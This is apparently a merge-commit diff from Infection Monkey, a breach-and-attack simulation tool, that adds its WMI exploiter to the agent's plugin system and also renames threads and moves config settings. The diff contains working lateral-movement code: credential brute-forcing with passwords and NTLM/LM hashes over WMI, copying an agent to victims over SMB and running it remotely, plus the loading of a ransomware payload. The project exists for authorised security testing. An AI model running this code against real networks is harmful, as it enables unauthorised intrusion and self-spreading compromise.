Merge pull request #1766 from guardicore/1742-wmi-exploiter

1742 add wmi exploiter to puppet
This commit is contained in:
Mike Salvatore 2022-03-09 10:17:54 -05:00 committed by GitHub
commit cbaa3256dd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
20 changed files with 180 additions and 103 deletions

View File

@ -20,6 +20,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
clearer instructions to the user and avoid confusion. #1684 clearer instructions to the user and avoid confusion. #1684
- The process list collection system info collector to now be a post-breach action. #1697 - The process list collection system info collector to now be a post-breach action. #1697
- The "/api/monkey/download" endpoint to accept an OS and return a file. #1675 - The "/api/monkey/download" endpoint to accept an OS and return a file. #1675
- Log messages to contain human-readable thread names. #1766
### Removed ### Removed
- VSFTPD exploiter. #1533 - VSFTPD exploiter. #1533

View File

@ -151,20 +151,6 @@ class Configuration(object):
""" """
return product(self.exploit_user_list, self.exploit_ssh_keys) return product(self.exploit_user_list, self.exploit_ssh_keys)
def get_exploit_user_password_or_hash_product(self):
"""
Returns all combinations of the configurations users and passwords or lm/ntlm hashes
:return:
"""
cred_list = []
for cred in product(self.exploit_user_list, self.exploit_password_list, [""], [""]):
cred_list.append(cred)
for cred in product(self.exploit_user_list, [""], [""], self.exploit_ntlm_hash_list):
cred_list.append(cred)
for cred in product(self.exploit_user_list, [""], self.exploit_lm_hash_list, [""]):
cred_list.append(cred)
return cred_list
@staticmethod @staticmethod
def hash_sensitive_data(sensitive_data): def hash_sensitive_data(sensitive_data):
""" """
@ -189,7 +175,7 @@ class Configuration(object):
aws_session_token = "" aws_session_token = ""
# smb/wmi exploiter # smb/wmi exploiter
smb_download_timeout = 300 # timeout in seconds smb_download_timeout = 30 # timeout in seconds
smb_service_name = "InfectionMonkey" smb_service_name = "InfectionMonkey"
########################### ###########################

View File

@ -52,6 +52,7 @@ class SmbExploiter(HostExploiter):
logger.info("Can't find suitable monkey executable for host %r", self.host) logger.info("Can't find suitable monkey executable for host %r", self.host)
return False return False
# TODO use infectionmonkey.utils.brute_force
creds = self._config.get_exploit_user_password_or_hash_product() creds = self._config.get_exploit_user_password_or_hash_product()
exploited = False exploited = False

View File

@ -1,6 +1,7 @@
import logging import logging
import ntpath import ntpath
import pprint import pprint
from io import BytesIO
from impacket.dcerpc.v5 import srvs, transport from impacket.dcerpc.v5 import srvs, transport
from impacket.smb3structs import SMB2_DIALECT_002, SMB2_DIALECT_21 from impacket.smb3structs import SMB2_DIALECT_002, SMB2_DIALECT_21
@ -17,10 +18,16 @@ logger = logging.getLogger(__name__)
class SmbTools(object): class SmbTools(object):
@staticmethod @staticmethod
def copy_file( def copy_file(
host, src_path, dst_path, username, password, lm_hash="", ntlm_hash="", timeout=60 host,
agent_file: BytesIO,
dst_path,
username,
password,
lm_hash="",
ntlm_hash="",
timeout=60,
): ):
# monkeyfs has been removed. Fix this in issue #1741 # TODO assess the 60 second timeout
# assert monkeyfs.isfile(src_path), "Source file to copy (%s) is missing" % (src_path,)
smb, dialect = SmbTools.new_smb_connection( smb, dialect = SmbTools.new_smb_connection(
host, username, password, lm_hash, ntlm_hash, timeout host, username, password, lm_hash, ntlm_hash, timeout
@ -138,21 +145,15 @@ class SmbTools(object):
remote_full_path = ntpath.join(share_path, remote_path.strip(ntpath.sep)) remote_full_path = ntpath.join(share_path, remote_path.strip(ntpath.sep))
try: try:
# monkeyfs has been removed. Fix this in issue #1741
"""
with monkeyfs.open(src_path, "rb") as source_file:
# make sure of the timeout
smb.setTimeout(timeout) smb.setTimeout(timeout)
smb.putFile(share_name, remote_path, source_file.read) smb.putFile(share_name, remote_path, agent_file.read)
"""
file_uploaded = True file_uploaded = True
T1105Telem( T1105Telem(
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, dst_path ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, dst_path
).send() ).send()
logger.info( logger.info(
"Copied monkey file '%s' to remote share '%s' [%s] on victim %r", "Copied monkey agent to remote share '%s' [%s] on victim %r",
src_path,
share_name, share_name,
share_path, share_path,
host, host,

View File

@ -1,4 +1,5 @@
import logging import logging
import threading
from impacket.dcerpc.v5.dcom import wmi from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dcom.wmi import DCERPCSessionError from impacket.dcerpc.v5.dcom.wmi import DCERPCSessionError
@ -8,6 +9,12 @@ from impacket.dcerpc.v5.dtypes import NULL
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
# Due to the limitations of impacket library we should only run one WmiConnection at a time
# Use impacket_user decorator to ensure that no race conditions are happening
# See comments in https://github.com/guardicore/monkey/pull/1766
lock = threading.Lock()
class AccessDeniedException(Exception): class AccessDeniedException(Exception):
def __init__(self, host, username, password, domain): def __init__(self, host, username, password, domain):
super(AccessDeniedException, self).__init__( super(AccessDeniedException, self).__init__(
@ -17,6 +24,15 @@ class AccessDeniedException(Exception):
class WmiTools(object): class WmiTools(object):
@staticmethod
def impacket_user(func):
def _wrapper(*args, **kwarg):
with lock:
return func(*args, **kwarg)
return _wrapper
class WmiConnection(object): class WmiConnection(object):
def __init__(self): def __init__(self):
self._dcom = None self._dcom = None
@ -88,7 +104,7 @@ class WmiTools(object):
for port_map in list(DCOMConnection.PORTMAPS.keys()): for port_map in list(DCOMConnection.PORTMAPS.keys()):
del DCOMConnection.PORTMAPS[port_map] del DCOMConnection.PORTMAPS[port_map]
for oid_set in list(DCOMConnection.OID_SET.keys()): for oid_set in list(DCOMConnection.OID_SET.keys()):
del DCOMConnection.OID_SET[port_map] del DCOMConnection.OID_SET[oid_set]
DCOMConnection.OID_SET = {} DCOMConnection.OID_SET = {}
DCOMConnection.PORTMAPS = {} DCOMConnection.PORTMAPS = {}

View File

@ -7,10 +7,14 @@ from impacket.dcerpc.v5.rpcrt import DCERPCException
from common.utils.exploit_enum import ExploitType from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
from infection_monkey.exploit.tools.smb_tools import SmbTools from infection_monkey.exploit.tools.smb_tools import SmbTools
from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools
from infection_monkey.i_puppet import ExploiterResultData
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
from infection_monkey.utils.brute_force import (
generate_brute_force_combinations,
get_credential_string,
)
from infection_monkey.utils.commands import build_monkey_commandline from infection_monkey.utils.commands import build_monkey_commandline
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
@ -21,30 +25,15 @@ class WmiExploiter(HostExploiter):
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
_EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)" _EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)"
def __init__(self, host): @WmiTools.impacket_user
super(WmiExploiter, self).__init__(host)
@WmiTools.dcom_wrap @WmiTools.dcom_wrap
def _exploit_host(self): def _exploit_host(self) -> ExploiterResultData:
src_path = get_target_monkey(self.host)
if not src_path: creds = generate_brute_force_combinations(self.options["credentials"])
logger.info("Can't find suitable monkey executable for host %r", self.host)
return False
creds = self._config.get_exploit_user_password_or_hash_product()
for user, password, lm_hash, ntlm_hash in creds: for user, password, lm_hash, ntlm_hash in creds:
password_hashed = self._config.hash_sensitive_data(password) creds_for_log = get_credential_string([user, password, lm_hash, ntlm_hash])
lm_hash_hashed = self._config.hash_sensitive_data(lm_hash) logger.debug(f"Attempting to connect to {self.host} using WMI with {creds_for_log}")
ntlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash)
creds_for_logging = (
"user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): "
"({},{},{},{})".format(user, password_hashed, lm_hash_hashed, ntlm_hash_hashed)
)
logger.debug(
("Attempting to connect %r using WMI with " % self.host) + creds_for_logging
)
wmi_connection = WmiTools.WmiConnection() wmi_connection = WmiTools.WmiConnection()
@ -52,72 +41,69 @@ class WmiExploiter(HostExploiter):
wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash) wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash)
except AccessDeniedException: except AccessDeniedException:
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
logger.debug( logger.debug(f"Failed connecting to {self.host} using WMI")
("Failed connecting to %r using WMI with " % self.host) + creds_for_logging
)
continue continue
except DCERPCException: except DCERPCException:
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
logger.debug( logger.debug(f"Failed connecting to {self.host} using WMI")
("Failed connecting to %r using WMI with " % self.host) + creds_for_logging
)
continue continue
except socket.error: except socket.error:
logger.debug( logger.debug(f"Network error in WMI connection to {self.host}")
("Network error in WMI connection to %r with " % self.host) + creds_for_logging return self.exploit_result
)
return False
except Exception as exc: except Exception as exc:
logger.debug( logger.debug(
("Unknown WMI connection error to %r with " % self.host) f"Unknown WMI connection error to {self.host}: "
+ creds_for_logging f"{exc} {traceback.format_exc()}"
+ (" (%s):\n%s" % (exc, traceback.format_exc()))
) )
return False return self.exploit_result
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
self.exploit_result.exploitation_success = True
# query process list and check if monkey already running on victim # query process list and check if monkey already running on victim
process_list = WmiTools.list_object( process_list = WmiTools.list_object(
wmi_connection, wmi_connection,
"Win32_Process", "Win32_Process",
fields=("Caption",), fields=("Caption",),
where="Name='%s'" % ntpath.split(src_path)[-1], where=f"Name='{ntpath.split(self.options['dropper_target_path_win_64'])[-1]}'",
) )
if process_list: if process_list:
wmi_connection.close() wmi_connection.close()
logger.debug("Skipping %r - already infected", self.host) logger.debug("Skipping %r - already infected", self.host)
return False return self.exploit_result
downloaded_agent = self.agent_repository.get_agent_binary(self.host.os["type"])
# copy the file remotely using SMB
remote_full_path = SmbTools.copy_file( remote_full_path = SmbTools.copy_file(
self.host, self.host,
src_path, downloaded_agent,
self._config.dropper_target_path_win_32, self.options["dropper_target_path_win_64"],
user, user,
password, password,
lm_hash, lm_hash,
ntlm_hash, ntlm_hash,
self._config.smb_download_timeout, self.options["smb_download_timeout"],
) )
if not remote_full_path: if not remote_full_path:
wmi_connection.close() wmi_connection.close()
return False return self.exploit_result
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): elif remote_full_path.lower() != self.options["dropper_target_path_win_64"]:
cmdline = DROPPER_CMDLINE_WINDOWS % { cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path": remote_full_path "dropper_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, self.host,
get_monkey_depth() - 1, self.current_depth - 1,
self._config.dropper_target_path_win_32, self.options["dropper_target_path_win_64"],
) )
else: else:
cmdline = MONKEY_CMDLINE_WINDOWS % { cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path": remote_full_path "monkey_path": remote_full_path
} + build_monkey_commandline(self.host, get_monkey_depth() - 1) } + build_monkey_commandline(self.host, self.current_depth - 1)
# execute the remote monkey # execute the remote monkey
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create( result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(
@ -134,7 +120,7 @@ class WmiExploiter(HostExploiter):
) )
self.add_vuln_port(port="unknown") self.add_vuln_port(port="unknown")
success = True self.exploit_result.propagation_success = True
else: else:
logger.debug( logger.debug(
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, " "Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
@ -145,11 +131,10 @@ class WmiExploiter(HostExploiter):
result.ReturnValue, result.ReturnValue,
cmdline, cmdline,
) )
success = False
result.RemRelease() result.RemRelease()
wmi_connection.close() wmi_connection.close()
self.add_executed_cmd(cmdline) self.add_executed_cmd(cmdline)
return success return self.exploit_result
return False return self.exploit_result

View File

@ -25,7 +25,7 @@ LOG_CONFIG = {
"disable_existing_loggers": False, "disable_existing_loggers": False,
"formatters": { "formatters": {
"standard": { "standard": {
"format": "%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(" "format": "%(asctime)s [%(process)d:%(threadName)s:%(levelname)s] %(module)s.%("
"funcName)s.%(lineno)d: %(message)s" "funcName)s.%(lineno)d: %(message)s"
}, },
}, },

View File

@ -55,8 +55,12 @@ class AutomatedMaster(IMaster):
) )
self._stop = threading.Event() self._stop = threading.Event()
self._master_thread = create_daemon_thread(target=self._run_master_thread) self._master_thread = create_daemon_thread(
self._simulation_thread = create_daemon_thread(target=self._run_simulation) target=self._run_master_thread, name="AutomatedMasterThread"
)
self._simulation_thread = create_daemon_thread(
target=self._run_simulation, name="SimulationThread"
)
def start(self): def start(self):
logger.info("Starting automated breach and attack simulation") logger.info("Starting automated breach and attack simulation")
@ -144,6 +148,7 @@ class AutomatedMaster(IMaster):
credential_collector_thread = create_daemon_thread( credential_collector_thread = create_daemon_thread(
target=self._run_plugins, target=self._run_plugins,
name="CredentialCollectorThread",
args=( args=(
config["credential_collector_classes"], config["credential_collector_classes"],
"credential collector", "credential collector",
@ -152,6 +157,7 @@ class AutomatedMaster(IMaster):
) )
pba_thread = create_daemon_thread( pba_thread = create_daemon_thread(
target=self._run_plugins, target=self._run_plugins,
name="PBAThread",
args=(config["post_breach_actions"].items(), "post-breach action", self._run_pba), args=(config["post_breach_actions"].items(), "post-breach action", self._run_pba),
) )
@ -172,6 +178,7 @@ class AutomatedMaster(IMaster):
payload_thread = create_daemon_thread( payload_thread = create_daemon_thread(
target=self._run_plugins, target=self._run_plugins,
name="PayloadThread",
args=(config["payloads"].items(), "payload", self._run_payload), args=(config["payloads"].items(), "payload", self._run_payload),
) )
payload_thread.start() payload_thread.start()

View File

@ -54,7 +54,10 @@ class Exploiter:
stop, stop,
) )
run_worker_threads( run_worker_threads(
target=self._exploit_hosts_on_queue, args=exploit_args, num_workers=self._num_workers target=self._exploit_hosts_on_queue,
name_prefix="ExploiterThread",
args=exploit_args,
num_workers=self._num_workers,
) )
@staticmethod @staticmethod

View File

@ -42,7 +42,10 @@ class IPScanner:
scan_ips_args = (addresses, options, results_callback, stop) scan_ips_args = (addresses, options, results_callback, stop)
run_worker_threads( run_worker_threads(
target=self._scan_addresses, args=scan_ips_args, num_workers=self._num_workers target=self._scan_addresses,
name_prefix="ScanThread",
args=scan_ips_args,
num_workers=self._num_workers,
) )
def _scan_addresses( def _scan_addresses(

View File

@ -46,10 +46,11 @@ class Propagator:
self._hosts_to_exploit = Queue() self._hosts_to_exploit = Queue()
scan_thread = create_daemon_thread( scan_thread = create_daemon_thread(
target=self._scan_network, args=(propagation_config, stop) target=self._scan_network, name="PropagatorScanThread", args=(propagation_config, stop)
) )
exploit_thread = create_daemon_thread( exploit_thread = create_daemon_thread(
target=self._exploit_hosts, target=self._exploit_hosts,
name="PropagatorExploitThread",
args=(propagation_config, current_depth, network_scan_completed, stop), args=(propagation_config, current_depth, network_scan_completed, stop),
) )

View File

@ -19,6 +19,7 @@ from infection_monkey.exploit import CachingAgentRepository, ExploiterWrapper
from infection_monkey.exploit.hadoop import HadoopExploiter from infection_monkey.exploit.hadoop import HadoopExploiter
from infection_monkey.exploit.log4shell import Log4ShellExploiter from infection_monkey.exploit.log4shell import Log4ShellExploiter
from infection_monkey.exploit.sshexec import SSHExploiter from infection_monkey.exploit.sshexec import SSHExploiter
from infection_monkey.exploit.wmiexec import WmiExploiter
from infection_monkey.i_puppet import IPuppet, PluginType from infection_monkey.i_puppet import IPuppet, PluginType
from infection_monkey.master import AutomatedMaster from infection_monkey.master import AutomatedMaster
from infection_monkey.master.control_channel import ControlChannel from infection_monkey.master.control_channel import ControlChannel
@ -212,17 +213,14 @@ class InfectionMonkey:
) )
exploit_wrapper = ExploiterWrapper(self.telemetry_messenger, agent_repository) exploit_wrapper = ExploiterWrapper(self.telemetry_messenger, agent_repository)
puppet.load_plugin(
"SSHExploiter",
exploit_wrapper.wrap(SSHExploiter),
PluginType.EXPLOITER,
)
puppet.load_plugin( puppet.load_plugin(
"HadoopExploiter", exploit_wrapper.wrap(HadoopExploiter), PluginType.EXPLOITER "HadoopExploiter", exploit_wrapper.wrap(HadoopExploiter), PluginType.EXPLOITER
) )
puppet.load_plugin( puppet.load_plugin(
"Log4ShellExploiter", exploit_wrapper.wrap(Log4ShellExploiter), PluginType.EXPLOITER "Log4ShellExploiter", exploit_wrapper.wrap(Log4ShellExploiter), PluginType.EXPLOITER
) )
puppet.load_plugin("SSHExploiter", exploit_wrapper.wrap(SSHExploiter), PluginType.EXPLOITER)
puppet.load_plugin("WmiExploiter", exploit_wrapper.wrap(WmiExploiter), PluginType.EXPLOITER)
puppet.load_plugin("ransomware", RansomwarePayload(), PluginType.PAYLOAD) puppet.load_plugin("ransomware", RansomwarePayload(), PluginType.PAYLOAD)

View File

@ -126,7 +126,7 @@ class MonkeyTunnel(Thread):
self._stopped = Event() self._stopped = Event()
self._clients = [] self._clients = []
self.local_port = None self.local_port = None
super(MonkeyTunnel, self).__init__() super(MonkeyTunnel, self).__init__(name="MonkeyTunnelThread")
self.daemon = True self.daemon = True
self.l_ips = None self.l_ips = None
self._wait_for_exploited_machines = Event() self._wait_for_exploited_machines = Event()

View File

@ -29,6 +29,6 @@ def _report_aws_environment(telemetry_messenger: LegacyTelemetryMessengerAdapter
def run_aws_environment_check(telemetry_messenger: LegacyTelemetryMessengerAdapter): def run_aws_environment_check(telemetry_messenger: LegacyTelemetryMessengerAdapter):
logger.info("AWS environment check initiated.") logger.info("AWS environment check initiated.")
aws_environment_thread = create_daemon_thread( aws_environment_thread = create_daemon_thread(
target=_report_aws_environment, args=(telemetry_messenger,) target=_report_aws_environment, name="AWSEnvironmentThread", args=(telemetry_messenger,)
) )
aws_environment_thread.start() aws_environment_thread.start()

View File

@ -1,5 +1,5 @@
from itertools import chain, product from itertools import chain, product
from typing import Any, Iterable, Tuple from typing import Any, Iterable, List, Mapping, Sequence, Tuple
def generate_identity_secret_pairs( def generate_identity_secret_pairs(
@ -38,3 +38,25 @@ def generate_username_password_or_ntlm_hash_combinations(
product(usernames, [""], lm_hashes, [""]), product(usernames, [""], lm_hashes, [""]),
product(usernames, [""], [""], nt_hashes), product(usernames, [""], [""], nt_hashes),
) )
def generate_brute_force_combinations(credentials: Mapping[str, Sequence[str]]):
return generate_username_password_or_ntlm_hash_combinations(
usernames=credentials["exploit_user_list"],
passwords=credentials["exploit_password_list"],
lm_hashes=credentials["exploit_lm_hash_list"],
nt_hashes=credentials["exploit_ntlm_hash_list"],
)
# Expects a list of username, password, lm hash and nt hash in that order
def get_credential_string(creds: List) -> str:
cred_strs = [
(creds[0], "username"),
(creds[1], "password"),
(creds[2], "lm hash"),
(creds[3], "nt hash"),
]
present_creds = [cred[1] for cred in cred_strs if cred[0]]
return ", ".join(present_creds)

View File

@ -1,14 +1,22 @@
import logging import logging
from itertools import count
from threading import Event, Thread from threading import Event, Thread
from typing import Any, Callable, Iterable, Tuple from typing import Any, Callable, Iterable, Tuple
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
def run_worker_threads(target: Callable[..., None], args: Tuple = (), num_workers: int = 2): def run_worker_threads(
target: Callable[..., None],
name_prefix: str,
args: Tuple = (),
num_workers: int = 2,
):
worker_threads = [] worker_threads = []
counter = run_worker_threads.counters.setdefault(name_prefix, count(start=1))
for i in range(0, num_workers): for i in range(0, num_workers):
t = create_daemon_thread(target=target, args=args) name = f"{name_prefix}-{next(counter)}"
t = create_daemon_thread(target=target, name=name, args=args)
t.start() t.start()
worker_threads.append(t) worker_threads.append(t)
@ -16,8 +24,11 @@ def run_worker_threads(target: Callable[..., None], args: Tuple = (), num_worker
t.join() t.join()
def create_daemon_thread(target: Callable[..., None], args: Tuple = ()) -> Thread: run_worker_threads.counters = {}
return Thread(target=target, args=args, daemon=True)
def create_daemon_thread(target: Callable[..., None], name: str, args: Tuple = ()) -> Thread:
return Thread(target=target, name=name, args=args, daemon=True)
def interruptable_iter( def interruptable_iter(

View File

@ -629,4 +629,18 @@ class ConfigService:
config.pop(flat_config_exploiter_classes_field, None) config.pop(flat_config_exploiter_classes_field, None)
return formatted_exploiters_config return ConfigService._add_smb_download_timeout_to_exploiters(
config, formatted_exploiters_config
)
@staticmethod
def _add_smb_download_timeout_to_exploiters(
flat_config: Dict, formatted_config: Dict
) -> Dict[str, List[Dict[str, Any]]]:
new_config = copy.deepcopy(formatted_config)
uses_smb_timeout = {"SmbExploiter", "WmiExploiter"}
for exploiter in filter(lambda e: e["name"] in uses_smb_timeout, new_config["brute_force"]):
exploiter["options"]["smb_download_timeout"] = flat_config["smb_download_timeout"]
return new_config

View File

@ -252,7 +252,7 @@ INTERNAL = {
"smb_download_timeout": { "smb_download_timeout": {
"title": "SMB download timeout", "title": "SMB download timeout",
"type": "integer", "type": "integer",
"default": 300, "default": 30,
"description": "Timeout (in seconds) for SMB download operation (used in " "description": "Timeout (in seconds) for SMB download operation (used in "
"various exploits using SMB)", "various exploits using SMB)",
}, },

View File

@ -1,14 +1,23 @@
import logging import logging
from threading import Event from threading import Event, current_thread
from infection_monkey.utils.threading import create_daemon_thread, interruptable_iter from infection_monkey.utils.threading import (
create_daemon_thread,
interruptable_iter,
run_worker_threads,
)
def test_create_daemon_thread(): def test_create_daemon_thread():
thread = create_daemon_thread(lambda: None) thread = create_daemon_thread(lambda: None, name="test")
assert thread.daemon assert thread.daemon
def test_create_daemon_thread_naming():
thread = create_daemon_thread(lambda: None, name="test")
assert thread.name == "test"
def test_interruptable_iter(): def test_interruptable_iter():
interrupt = Event() interrupt = Event()
items_from_iterator = [] items_from_iterator = []
@ -45,3 +54,22 @@ def test_interruptable_iter_interrupted_before_used():
items_from_iterator.append(i) items_from_iterator.append(i)
assert not items_from_iterator assert not items_from_iterator
def test_worker_thread_names():
thread_names = set()
def add_thread_name_to_list():
thread_names.add(current_thread().name)
run_worker_threads(target=add_thread_name_to_list, name_prefix="A", num_workers=2)
run_worker_threads(target=add_thread_name_to_list, name_prefix="B", num_workers=2)
run_worker_threads(target=add_thread_name_to_list, name_prefix="A", num_workers=2)
assert "A-1" in thread_names
assert "A-2" in thread_names
assert "A-3" in thread_names
assert "A-4" in thread_names
assert "B-1" in thread_names
assert "B-2" in thread_names
assert len(thread_names) == 6

View File

@ -180,8 +180,8 @@ def test_format_config_for_agent__exploiters(flat_monkey_config):
{"name": "MSSQLExploiter", "options": {}}, {"name": "MSSQLExploiter", "options": {}},
{"name": "PowerShellExploiter", "options": {}}, {"name": "PowerShellExploiter", "options": {}},
{"name": "SSHExploiter", "options": {}}, {"name": "SSHExploiter", "options": {}},
{"name": "SmbExploiter", "options": {}}, {"name": "SmbExploiter", "options": {"smb_download_timeout": 300}},
{"name": "WmiExploiter", "options": {}}, {"name": "WmiExploiter", "options": {"smb_download_timeout": 300}},
], ],
"vulnerability": [ "vulnerability": [
{"name": "DrupalExploiter", "options": {}}, {"name": "DrupalExploiter", "options": {}},